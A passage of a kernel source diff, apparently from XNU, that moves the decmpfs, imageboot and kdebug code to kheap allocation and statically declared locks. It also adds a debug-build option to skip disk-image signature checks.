+SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_atomic_counter_load,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED,
+    0, 0, sysctl_atomic_counter_load, "I", "Atomic counter load");
index 4040d9b6a59a4004cc7d23328ce281b70dabbf8b..1f5bc434f6ef96208a8ab97d8e10922db6253907 100644 (file)
@@ -80,22 +80,6 @@ UNUSED_SYMBOL(decmpfs_validate_compressed_file)
 #define COMPRESSION_DEBUG_VERBOSE 0
 #define MALLOC_DEBUG 0
 
-static const char *
-baseName(const char *path)
-{
-       if (!path) {
-               return NULL;
-       }
-       const char *ret = path;
-       int i;
-       for (i = 0; path[i] != 0; i++) {
-               if (path[i] == '/') {
-                       ret = &path[i + 1];
-               }
-       }
-       return ret;
-}
-
 #if COMPRESSION_DEBUG
 static char*
 vnpath(vnode_t vp, char *path, int len)
@@ -108,11 +92,21 @@ vnpath(vnode_t vp, char *path, int len)
 }
 #endif
 
-#define ErrorLog(x, args...) printf("%s:%d:%s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, ## args)
+#define ErrorLog(x, args...) \
+       printf("%s:%d:%s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, ## args)
 #if COMPRESSION_DEBUG
-#define ErrorLogWithPath(x, args...) do { char *path; MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK); printf("%s:%d:%s: %s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, vnpath(vp, path, PATH_MAX), ## args); FREE(path, M_TEMP); } while(0)
+#define ErrorLogWithPath(x, args...) do { \
+       char *path = zalloc(ZV_NAMEI); \
+       printf("%s:%d:%s: %s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, \
+           vnpath(vp, path, PATH_MAX), ## args); \
+       zfree(ZV_NAMEI, path); \
+} while(0)
 #else
-#define ErrorLogWithPath(x, args...) do { (void*)vp; printf("%s:%d:%s: %s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, "<private>", ## args); } while(0)
+#define ErrorLogWithPath(x, args...) do { \
+       (void*)vp; \
+       printf("%s:%d:%s: %s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, \
+           "<private>", ## args); \
+} while(0)
 #endif
 
 #if COMPRESSION_DEBUG
@@ -131,88 +125,14 @@ vnpath(vnode_t vp, char *path, int len)
 #define VerboseLogWithPath(x...) do { } while(0)
 #endif
 
-#if MALLOC_DEBUG
-
-static SInt32 totalAlloc;
-
-typedef struct {
-       uint32_t allocSz;
-       uint32_t magic;
-       const char *file;
-       int line;
-} allocated;
-
-static void *
-_malloc(uint32_t sz, __unused int type, __unused int flags, const char *file, int line)
-{
-       uint32_t allocSz = sz + 2 * sizeof(allocated);
-
-       allocated *alloc = NULL;
-       MALLOC(alloc, allocated *, allocSz, type, flags);
-       if (!alloc) {
-               ErrorLog("malloc failed\n");
-               return NULL;
-       }
-
-       char *ret = (char*)&alloc[1];
-       allocated *alloc2 = (allocated*)(ret + sz);
-
-       alloc->allocSz = allocSz;
-       alloc->magic = 0xdadadada;
-       alloc->file = file;
-       alloc->line = line;
-
-       *alloc2 = *alloc;
-
-       int s = OSAddAtomic(sz, &totalAlloc);
-       ErrorLog("malloc(%d) -> %p, total allocations %d\n", sz, ret, s + sz);
-
-       return ret;
-}
-
-static void
-_free(char *ret, __unused int type, const char *file, int line)
-{
-       if (!ret) {
-               ErrorLog("freeing null\n");
-               return;
-       }
-       allocated *alloc = (allocated*)ret;
-       alloc--;
-       uint32_t sz = alloc->allocSz - 2 * sizeof(allocated);
-       allocated *alloc2 = (allocated*)(ret + sz);
-
-       if (alloc->magic != 0xdadadada) {
-               panic("freeing bad pointer");
-       }
-
-       if (memcmp(alloc, alloc2, sizeof(*alloc)) != 0) {
-               panic("clobbered data");
-       }
-
-       memset(ret, 0xce, sz);
-       alloc2->file = file;
-       alloc2->line = line;
-       FREE(alloc, type);
-       int s = OSAddAtomic(-sz, &totalAlloc);
-       ErrorLog("free(%p,%d) -> total allocations %d\n", ret, sz, s - sz);
-}
-
-#undef MALLOC
-#undef FREE
-#define MALLOC(space, cast, size, type, flags) (space) = (cast)_malloc(size, type, flags, __FILE__, __LINE__)
-#define FREE(addr, type) _free((void *)addr, type, __FILE__, __LINE__)
-
-#endif /* MALLOC_DEBUG */
-
 #pragma mark --- globals ---
 
-static lck_grp_t *decmpfs_lockgrp;
+static LCK_GRP_DECLARE(decmpfs_lockgrp, "VFSCOMP");
+static LCK_RW_DECLARE(decompressorsLock, &decmpfs_lockgrp);
+static LCK_MTX_DECLARE(decompress_channel_mtx, &decmpfs_lockgrp);
 
 static const decmpfs_registration *decompressors[CMP_MAX]; /* the registered compressors */
-static lck_rw_t * decompressorsLock;
 static int decompress_channel; /* channel used by decompress_file to wake up waiters */
-static lck_mtx_t *decompress_channel_mtx;
 
 vfs_context_t decmpfs_ctx;
 
@@ -280,20 +200,20 @@ _decmp_get_func(vnode_t vp, uint32_t type, uintptr_t offset, uint32_t discrimina
                snprintf(resourceName, sizeof(resourceName), "com.apple.AppleFSCompression.Type%u", type);
                ErrorLogWithPath("waiting for %s\n", resourceName);
                while (decompressors[type] == NULL) {
-                       lck_rw_unlock_shared(decompressorsLock); // we have to unlock to allow the kext to register
+                       lck_rw_unlock_shared(&decompressorsLock); // we have to unlock to allow the kext to register
                        if (IOServiceWaitForMatchingResource(resourceName, delay)) {
-                               lck_rw_lock_shared(decompressorsLock);
+                               lck_rw_lock_shared(&decompressorsLock);
                                break;
                        }
                        if (!IOCatalogueMatchingDriversPresent(providesName)) {
                                //
                                ErrorLogWithPath("the kext with %s is no longer present\n", providesName);
-                               lck_rw_lock_shared(decompressorsLock);
+                               lck_rw_lock_shared(&decompressorsLock);
                                break;
                        }
                        ErrorLogWithPath("still waiting for %s\n", resourceName);
                        delay *= 2;
-                       lck_rw_lock_shared(decompressorsLock);
+                       lck_rw_lock_shared(&decompressorsLock);
                }
                // IOKit says the kext is loaded, so it should be registered too!
                if (decompressors[type] == NULL) {
@@ -351,13 +271,13 @@ void
 decmpfs_cnode_init(decmpfs_cnode *cp)
 {
        memset(cp, 0, sizeof(*cp));
-       lck_rw_init(&cp->compressed_data_lock, decmpfs_lockgrp, NULL);
+       lck_rw_init(&cp->compressed_data_lock, &decmpfs_lockgrp, NULL);
 }
 
 void
 decmpfs_cnode_destroy(decmpfs_cnode *cp)
 {
-       lck_rw_destroy(&cp->compressed_data_lock, decmpfs_lockgrp);
+       lck_rw_destroy(&cp->compressed_data_lock, &decmpfs_lockgrp);
 }
 
 bool
@@ -549,7 +469,7 @@ decmpfs_cnode_cmp_type(decmpfs_cnode *cp)
 #pragma mark --- decmpfs state routines ---
 
 static int
-decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **hdrOut, int returnInvalid)
+decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **hdrOut, int returnInvalid, size_t *hdr_size)
 {
        /*
         *  fetches vp's compression xattr, converting it into a decmpfs_header; returns 0 or errno
@@ -559,6 +479,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
 
        size_t read_size             = 0;
        size_t attr_size             = 0;
+       size_t alloc_size            = 0;
        uio_t attr_uio               = NULL;
        int err                      = 0;
        char *data                   = NULL;
@@ -581,7 +502,8 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
        if (no_additional_data) {
                /* this file's xattr didn't have any extra data when we fetched it, so we can synthesize a header from the data in the cnode */
 
-               MALLOC(data, char *, sizeof(decmpfs_header), M_TEMP, M_WAITOK);
+               alloc_size = sizeof(decmpfs_header);
+               data = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK);
                if (!data) {
                        err = ENOMEM;
                        goto out;
@@ -609,6 +531,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
                if (err != 0) {
                        goto out;
                }
+               alloc_size = attr_size + sizeof(hdr->attr_size);
 
                if (attr_size < sizeof(decmpfs_disk_header) || attr_size > MAX_DECMPFS_XATTR_SIZE) {
                        err = EINVAL;
@@ -616,7 +539,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
                }
 
                /* allocation includes space for the extra attr_size field of a compressed_header */
-               MALLOC(data, char *, attr_size + sizeof(hdr->attr_size), M_TEMP, M_WAITOK);
+               data = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK);
                if (!data) {
                        err = ENOMEM;
                        goto out;
@@ -669,12 +592,11 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **
 out:
        if (err && (err != ERANGE)) {
                DebugLogWithPath("err %d\n", err);
-               if (data) {
-                       FREE(data, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, data, alloc_size);
                *hdrOut = NULL;
        } else {
                *hdrOut = hdr;
+               *hdr_size = alloc_size;
        }
        /*
         * Trace the following parameters on return with event-id 0x03120004.
@@ -744,9 +666,10 @@ errno_t
 decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp)
 {
        /* give a compressor a chance to indicate that a compressed file is invalid */
-
        decmpfs_header *hdr = NULL;
-       errno_t err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       size_t alloc_size = 0;
+       errno_t err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size);
+
        if (err) {
                /* we couldn't get the header */
                if (decmpfs_fast_get_state(cp) == FILE_IS_NOT_COMPRESSED) {
@@ -757,7 +680,7 @@ decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp)
        }
 
        if (!decmpfs_type_is_dataless(hdr->compression_type)) {
-               lck_rw_lock_shared(decompressorsLock);
+               lck_rw_lock_shared(&decompressorsLock);
                decmpfs_validate_compressed_file_func validate = decmp_get_func(vp, hdr->compression_type, validate);
                if (validate) { /* make sure this validation function is valid */
                        /* is the data okay? */
@@ -769,11 +692,11 @@ decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp)
                        /* no validate registered, so nothing to do */
                        err = 0;
                }
-               lck_rw_unlock_shared(decompressorsLock);
+               lck_rw_unlock_shared(&decompressorsLock);
        }
 out:
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
 #if COMPRESSION_DEBUG
        if (err) {
@@ -799,6 +722,7 @@ decmpfs_file_is_compressed(vnode_t vp, decmpfs_cnode *cp)
        uint32_t cmp_state;
        struct vnode_attr va_fetch;
        decmpfs_header *hdr = NULL;
+       size_t alloc_size = 0;
        mount_t mp = NULL;
        int cnode_locked = 0;
        int saveInvalid = 0; // save the header data even though the type was out of range
@@ -882,7 +806,7 @@ decmpfs_file_is_compressed(vnode_t vp, decmpfs_cnode *cp)
        }
        if (va_fetch.va_flags & UF_COMPRESSED) {
                /* UF_COMPRESSED is on, make sure the file has the DECMPFS_XATTR_NAME xattr */
-               error = decmpfs_fetch_compressed_header(vp, cp, &hdr, 1);
+               error = decmpfs_fetch_compressed_header(vp, cp, &hdr, 1, &alloc_size);
                if ((hdr != NULL) && (error == ERANGE)) {
                        saveInvalid = 1;
                }
@@ -942,12 +866,12 @@ done:
                        ubc_setsize(vp, hdr->uncompressed_size);
 
                        /* update the decompression flags in the decmpfs cnode */
-                       lck_rw_lock_shared(decompressorsLock);
+                       lck_rw_lock_shared(&decompressorsLock);
                        decmpfs_get_decompression_flags_func get_flags = decmp_get_func(vp, hdr->compression_type, get_flags);
                        if (get_flags) {
                                decompression_flags = get_flags(vp, decmpfs_ctx, hdr);
                        }
-                       lck_rw_unlock_shared(decompressorsLock);
+                       lck_rw_unlock_shared(&decompressorsLock);
                        decmpfs_cnode_set_decompression_flags(cp, decompression_flags);
                }
        } else {
@@ -959,9 +883,10 @@ done:
                decmpfs_unlock_compressed_data(cp, 1);
        }
 
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
+
        /*
         * Trace the following parameters on return with event-id 0x03120014.
         *
@@ -1021,7 +946,8 @@ decmpfs_update_attributes(vnode_t vp, struct vnode_attr *vap)
                                }
 
                                decmpfs_header *hdr = NULL;
-                               error = decmpfs_fetch_compressed_header(vp, NULL, &hdr, 1);
+                               size_t alloc_size = 0;
+                               error = decmpfs_fetch_compressed_header(vp, NULL, &hdr, 1, &alloc_size);
                                if (error == 0) {
                                        /*
                                         * Allow the flag to be set since the decmpfs attribute
@@ -1043,8 +969,8 @@ decmpfs_update_attributes(vnode_t vp, struct vnode_attr *vap)
                                        /* no DECMPFS_XATTR_NAME attribute, so deny the update */
                                        vap->va_flags &= ~UF_COMPRESSED;
                                }
-                               if (hdr) {
-                                       FREE(hdr, M_TEMP);
+                               if (hdr != NULL) {
+                                       kheap_free(KHEAP_TEMP, hdr, alloc_size);
                                }
                        }
                }
@@ -1057,15 +983,15 @@ static int
 wait_for_decompress(decmpfs_cnode *cp)
 {
        int state;
-       lck_mtx_lock(decompress_channel_mtx);
+       lck_mtx_lock(&decompress_channel_mtx);
        do {
                state = decmpfs_fast_get_state(cp);
                if (state != FILE_IS_CONVERTING) {
                        /* file is not decompressing */
-                       lck_mtx_unlock(decompress_channel_mtx);
+                       lck_mtx_unlock(&decompress_channel_mtx);
                        return state;
                }
-               msleep((caddr_t)&decompress_channel, decompress_channel_mtx, PINOD, "wait_for_decompress", NULL);
+               msleep((caddr_t)&decompress_channel, &decompress_channel_mtx, PINOD, "wait_for_decompress", NULL);
        } while (1);
 }
 
@@ -1145,7 +1071,7 @@ register_decmpfs_decompressor(uint32_t compression_type, const decmpfs_registrat
                goto out;
        }
 
-       lck_rw_lock_exclusive(decompressorsLock); locked = 1;
+       lck_rw_lock_exclusive(&decompressorsLock); locked = 1;
 
        /* make sure the registration for this type is zero */
        if (decompressors[compression_type] != NULL) {
@@ -1158,7 +1084,7 @@ register_decmpfs_decompressor(uint32_t compression_type, const decmpfs_registrat
 
 out:
        if (locked) {
-               lck_rw_unlock_exclusive(decompressorsLock);
+               lck_rw_unlock_exclusive(&decompressorsLock);
        }
        return ret;
 }
@@ -1177,7 +1103,7 @@ unregister_decmpfs_decompressor(uint32_t compression_type, decmpfs_registration
                goto out;
        }
 
-       lck_rw_lock_exclusive(decompressorsLock); locked = 1;
+       lck_rw_lock_exclusive(&decompressorsLock); locked = 1;
        if (decompressors[compression_type] != registration) {
                ret = EEXIST;
                goto out;
@@ -1188,7 +1114,7 @@ unregister_decmpfs_decompressor(uint32_t compression_type, decmpfs_registration
 
 out:
        if (locked) {
-               lck_rw_unlock_exclusive(decompressorsLock);
+               lck_rw_unlock_exclusive(&decompressorsLock);
        }
        return ret;
 }
@@ -1200,11 +1126,11 @@ compression_type_valid(vnode_t vp, decmpfs_header *hdr)
        int ret = 0;
 
        /* every compressor must have at least a fetch function */
-       lck_rw_lock_shared(decompressorsLock);
+       lck_rw_lock_shared(&decompressorsLock);
        if (decmp_get_func(vp, hdr->compression_type, fetch) != NULL) {
                ret = 1;
        }
-       lck_rw_unlock_shared(decompressorsLock);
+       lck_rw_unlock_shared(&decompressorsLock);
 
        return ret;
 }
@@ -1253,11 +1179,11 @@ decmpfs_fetch_uncompressed_data(vnode_t vp, decmpfs_cnode *cp, decmpfs_header *h
         */
        DECMPFS_EMIT_TRACE_ENTRY(DECMPDBG_FETCH_UNCOMPRESSED_DATA, vp->v_id,
            hdr->compression_type, (int)offset, (int)size);
-       lck_rw_lock_shared(decompressorsLock);
+       lck_rw_lock_shared(&decompressorsLock);
        decmpfs_fetch_uncompressed_data_func fetch = decmp_get_func(vp, hdr->compression_type, fetch);
        if (fetch) {
                err = fetch(vp, decmpfs_ctx, hdr, offset, size, nvec, vec, bytes_read);
-               lck_rw_unlock_shared(decompressorsLock);
+               lck_rw_unlock_shared(&decompressorsLock);
                if (err == 0) {
                        uint64_t decompression_flags = decmpfs_cnode_get_decompression_flags(cp);
                        if (decompression_flags & DECMPFS_FLAGS_FORCE_FLUSH_ON_DECOMPRESS) {
@@ -1272,7 +1198,7 @@ decmpfs_fetch_uncompressed_data(vnode_t vp, decmpfs_cnode *cp, decmpfs_header *h
                }
        } else {
                err = ENOTSUP;
-               lck_rw_unlock_shared(decompressorsLock);
+               lck_rw_unlock_shared(&decompressorsLock);
        }
        /*
         * Trace the following parameters on return with event-id 0x03120008.
@@ -1333,6 +1259,7 @@ decmpfs_pagein_compressed(struct vnop_pagein_args *ap, int *is_compressed, decmp
        size_t verify_block_size     = 0;
        void *data                   = NULL;
        decmpfs_header *hdr = NULL;
+       size_t alloc_size            = 0;
        uint64_t cachedSize          = 0;
        int cmpdata_locked           = 0;
        bool file_tail_page_valid    = false;
@@ -1349,7 +1276,7 @@ decmpfs_pagein_compressed(struct vnop_pagein_args *ap, int *is_compressed, decmp
                DebugLogWithPath("pagein: unknown flags 0x%08x\n", (flags & ~(UPL_IOSYNC | UPL_NOCOMMIT | UPL_NORDAHEAD)));
        }
 
-       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size);
        if (err != 0) {
                goto out;
        }
@@ -1613,8 +1540,8 @@ out:
        if (data) {
                ubc_upl_unmap(pl);
        }
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
        if (cmpdata_locked) {
                decmpfs_unlock_compressed_data(cp, 0);
@@ -1622,10 +1549,9 @@ out:
        if (err) {
 #if 0
                if (err != ENXIO && err != ENOSPC) {
-                       char *path;
-                       MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK);
+                       char *path = zalloc(ZV_NAMEI);
                        panic("%s: decmpfs_pagein_compressed: err %d", vnpath(vp, path, PATH_MAX), err);
-                       FREE(path, M_TEMP);
+                       zfree(ZV_NAMEI, path);
                }
 #endif /* 0 */
                ErrorLogWithPath("err %d\n", err);
@@ -1654,6 +1580,7 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c
        upl_t upl                    = NULL;
        upl_page_info_t *pli         = NULL;
        decmpfs_header *hdr          = NULL;
+       size_t alloc_size            = 0;
        uint64_t cachedSize          = 0;
        off_t uioPos                 = 0;
        user_ssize_t uioRemaining    = 0;
@@ -1694,7 +1621,7 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c
                goto out;
        }
 
-       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size);
        if (err != 0) {
                goto out;
        }
@@ -1709,14 +1636,14 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c
        DebugLogWithPath("uplPos %lld uplSize %lld\n", (uint64_t)uplPos, (uint64_t)uplSize);
 #endif
 
-       lck_rw_lock_shared(decompressorsLock);
+       lck_rw_lock_shared(&decompressorsLock);
        decmpfs_adjust_fetch_region_func adjust_fetch = decmp_get_func(vp, hdr->compression_type, adjust_fetch);
        if (adjust_fetch) {
                /* give the compressor a chance to adjust the portion of the file that we read */
                adjust_fetch(vp, decmpfs_ctx, hdr, &uplPos, &uplSize);
                VerboseLogWithPath("adjusted uplPos %lld uplSize %lld\n", (uint64_t)uplPos, (uint64_t)uplSize);
        }
-       lck_rw_unlock_shared(decompressorsLock);
+       lck_rw_unlock_shared(&decompressorsLock);
 
        /* clip the adjusted size to the size of the file */
        if ((uint64_t)uplPos + uplSize > cachedSize) {
@@ -1791,10 +1718,9 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c
                if (kr != KERN_SUCCESS) {
                        commit_upl(upl, 0, curUplSize, UPL_ABORT_FREE_ON_EMPTY, 1);
 #if 0
-                       char *path;
-                       MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK);
+                       char *path = zalloc(ZV_NAMEI);
                        panic("%s: decmpfs_read_compressed: ubc_upl_map error %d", vnpath(vp, path, PATH_MAX), (int)kr);
-                       FREE(path, M_TEMP);
+                       zfree(ZV_NAMEI, path);
 #else /* 0 */
                        ErrorLogWithPath("ubc_upl_map kr=0x%x\n", (int)kr);
 #endif /* 0 */
@@ -1901,8 +1827,8 @@ decompress:
 
 out:
 
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
        if (cmpdata_locked) {
                decmpfs_unlock_compressed_data(cp, 0);
@@ -1929,6 +1855,7 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp)
         *  then delete the file's compression xattr
         */
        decmpfs_header *hdr = NULL;
+       size_t alloc_size = 0;
 
        /*
         * Trace the following parameters on entry with event-id 0x03120010.
@@ -1937,11 +1864,11 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp)
         */
        DECMPFS_EMIT_TRACE_ENTRY(DECMPDBG_FREE_COMPRESSED_DATA, vp->v_id);
 
-       int err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       int err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size);
        if (err) {
                ErrorLogWithPath("decmpfs_fetch_compressed_header err %d\n", err);
        } else {
-               lck_rw_lock_shared(decompressorsLock);
+               lck_rw_lock_shared(&decompressorsLock);
                decmpfs_free_compressed_data_func free_data = decmp_get_func(vp, hdr->compression_type, free_data);
                if (free_data) {
                        err = free_data(vp, decmpfs_ctx, hdr);
@@ -1949,7 +1876,7 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp)
                        /* nothing to do, so no error */
                        err = 0;
                }
-               lck_rw_unlock_shared(decompressorsLock);
+               lck_rw_unlock_shared(&decompressorsLock);
 
                if (err != 0) {
                        ErrorLogWithPath("decompressor err %d\n", err);
@@ -1965,13 +1892,9 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp)
 
        /* delete the xattr */
        err = vn_removexattr(vp, DECMPFS_XATTR_NAME, 0, decmpfs_ctx);
-       if (err != 0) {
-               goto out;
-       }
 
-out:
-       if (hdr) {
-               FREE(hdr, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, alloc_size);
        }
        return err;
 }
@@ -2018,6 +1941,7 @@ decmpfs_decompress_file(vnode_t vp, decmpfs_cnode *cp, off_t toSize, int truncat
        int update_file_state        = 0;
        size_t allocSize             = 0;
        decmpfs_header *hdr          = NULL;
+       size_t hdr_size              = 0;
        int cmpdata_locked           = 0;
        off_t remaining              = 0;
        uint64_t uncompressed_size   = 0;
@@ -2077,7 +2001,7 @@ decompress:
        }
        }
 
-       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0);
+       err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &hdr_size);
        if (err != 0) {
                goto out;
        }
@@ -2096,7 +2020,7 @@ decompress:
        }
 
        allocSize = MIN(64 * 1024, (size_t)toSize);
-       MALLOC(data, char *, allocSize, M_TEMP, M_WAITOK);
+       data = kheap_alloc(KHEAP_TEMP, allocSize, Z_WAITOK);
        if (!data) {
                err = ENOMEM;
                goto out;
@@ -2210,12 +2134,10 @@ nodecmp:
 #endif
 
 out:
-       if (hdr) {
-               FREE(hdr, M_TEMP);
-       }
-       if (data) {
-               FREE(data, M_TEMP);
+       if (hdr != NULL) {
+               kheap_free(KHEAP_TEMP, hdr, hdr_size);
        }
+       kheap_free(KHEAP_TEMP, data, allocSize);
        if (uio_w) {
                uio_free(uio_w);
        }
@@ -2231,10 +2153,10 @@ out:
        }
 
        if (update_file_state) {
-               lck_mtx_lock(decompress_channel_mtx);
+               lck_mtx_lock(&decompress_channel_mtx);
                decmpfs_cnode_set_vnode_state(cp, new_state, 1);
                wakeup((caddr_t)&decompress_channel); /* wake up anyone who might have been waiting for decompression */
-               lck_mtx_unlock(decompress_channel_mtx);
+               lck_mtx_unlock(&decompress_channel_mtx);
        }
 
        if (cmpdata_locked) {
@@ -2318,7 +2240,7 @@ SECURITY_READ_ONLY_EARLY(static decmpfs_registration) Type1Reg =
 #pragma mark --- decmpfs initialization ---
 
 void
-decmpfs_init()
+decmpfs_init(void)
 {
        static int done = 0;
        if (done) {
@@ -2327,12 +2249,6 @@ decmpfs_init()
 
        decmpfs_ctx = vfs_context_create(vfs_context_kernel());
 
-       lck_grp_attr_t *attr = lck_grp_attr_alloc_init();
-       decmpfs_lockgrp = lck_grp_alloc_init("VFSCOMP", attr);
-       lck_grp_attr_free(attr);
-       decompressorsLock = lck_rw_alloc_init(decmpfs_lockgrp, NULL);
-       decompress_channel_mtx = lck_mtx_alloc_init(decmpfs_lockgrp, NULL);
-
        register_decmpfs_decompressor(CMP_Type1, &Type1Reg);
 
        done = 1;
index 36a275c68e36e75b22b4c0fc89f3bd9a1b4dd0fd..1672c8f1fb2964493d79b05fa71f479c938116ad 100644 (file)
@@ -91,7 +91,7 @@ static boolean_t imageboot_setup_new(imageboot_type_t type);
 
 void *ubc_getobject_from_filename(const char *filename, struct vnode **vpp, off_t *file_size);
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 
 #define kIBFilePrefix "file://"
 
@@ -199,12 +199,12 @@ extern bool IOBaseSystemARVRootHashAvailable(void);
  * It will be mounted at mount_path.
  * The vfs_switch_root operation will be performed.
  * After the pivot, the outgoing root filesystem (the filesystem at root when
- * this function begins) will be at outgoing_root_path.  If `rooted_dmg` is true,
- * then ignore then chunklisted or authAPFS checks on this image
+ * this function begins) will be at outgoing_root_path.  If `skip_signature_check` is true,
+ * then ignore the chunklisted or authAPFS checks on this image
  */
 __private_extern__ int
 imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path,
-    const char *outgoing_root_path, const bool rooted_dmg)
+    const char *outgoing_root_path, const bool rooted_dmg, const bool skip_signature_check)
 {
        int error;
        boolean_t authenticated_dmg_chunklist = false;
@@ -324,8 +324,9 @@ imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char
                /*
                 * If we are using a custom rooted DMG, or if we have already authenticated
                 * the DMG via chunklist, then it is permissible to use.
+                * Or, if CSR_ALLOW_ANY_RECOVERY_OS is set on Development or Debug build variant.
                 */
-               if (rooted_dmg || authenticated_dmg_chunklist) {
+               if (rooted_dmg || authenticated_dmg_chunklist || skip_signature_check) {
                        rootauth = 0;
                }
                error = rootauth;
@@ -505,7 +506,7 @@ imageboot_mount_image(const char *root_path, int height, imageboot_type_t type)
        vnode_ref(newdp);
        vnode_put(newdp);
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
        /* switch to the new rootvnode */
        if (update_rootvnode) {
                rootvnode = newdp;
@@ -518,7 +519,7 @@ imageboot_mount_image(const char *root_path, int height, imageboot_type_t type)
        mount_unlock(new_rootfs);
 
        filedesc0.fd_cdir = newdp;
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
 
        DBG_TRACE("%s: root switched\n", __FUNCTION__);
 
@@ -696,6 +697,9 @@ imgboot_get_image_file(const char *path, off_t *fsize, int *errp)
        }
 
        if (err) {
+               if (vp) {
+                       vnode_put(vp);
+               }
                *errp = err;
                vp = NULL;
        }
@@ -843,15 +847,15 @@ imageboot_mount_ramdisk(const char *path)
 #endif
 
        /* ... and unmount everything */
-       vfs_unmountall();
+       vfs_unmountall(FALSE);
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
        filedesc0.fd_cdir = NULL;
        tvp = rootvnode;
        rootvnode = NULL;
        rootvp = NULLVP;
        rootdev = NODEV;
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
        vnode_get_and_drop_always(tvp);
 
        /* Attach the ramfs image ... */
@@ -876,7 +880,7 @@ imageboot_mount_ramdisk(const char *path)
        }
        vnode_ref(newdp);
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
        rootvnode = newdp;
        rootvnode->v_flag |= VROOT;
        new_rootfs = rootvnode->v_mount;
@@ -887,7 +891,7 @@ imageboot_mount_ramdisk(const char *path)
        set_fake_bootuuid(new_rootfs);
 
        filedesc0.fd_cdir = newdp;
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
 
        vnode_put(newdp);
 
index f0ca4b75c881484ed2ab0605c3970eee207ed69a..2d3de0289e39c5799288f094211dc29d9ab1c273 100644 (file)
@@ -440,8 +440,9 @@ unsigned int kdlog_value2 = 0;
 unsigned int kdlog_value3 = 0;
 unsigned int kdlog_value4 = 0;
 
-static lck_spin_t * kdw_spin_lock;
-static lck_spin_t * kds_spin_lock;
+static LCK_GRP_DECLARE(kdebug_lck_grp, "kdebug");
+static LCK_SPIN_DECLARE(kdw_spin_lock, &kdebug_lck_grp);
+static LCK_SPIN_DECLARE(kds_spin_lock, &kdebug_lck_grp);
 
 kd_threadmap *kd_mapptr = 0;
 vm_size_t kd_mapsize = 0;
@@ -665,8 +666,6 @@ kdbg_iop_list_callback(kd_iop_t* iop, kd_callback_type type, void* arg)
        }
 }
 
-static lck_grp_t *kdebug_lck_grp = NULL;
-
 static void
 kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type)
 {
